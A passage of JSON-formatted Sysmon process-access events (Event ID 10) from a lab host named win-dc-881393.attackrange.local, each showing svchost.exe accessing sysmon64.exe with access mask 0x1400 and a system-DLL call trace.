05:56:50.195","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6215,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:50.195\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:50.195","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6216,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:50.195\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:50.195","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6217,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:50.195\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:50.195","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6218,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:50.195\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:50.195","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6219,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:50.195\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:50.195","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6220,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:50.195\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:50.195","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6221,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:50.195\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:50.195","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6222,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:50.195\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 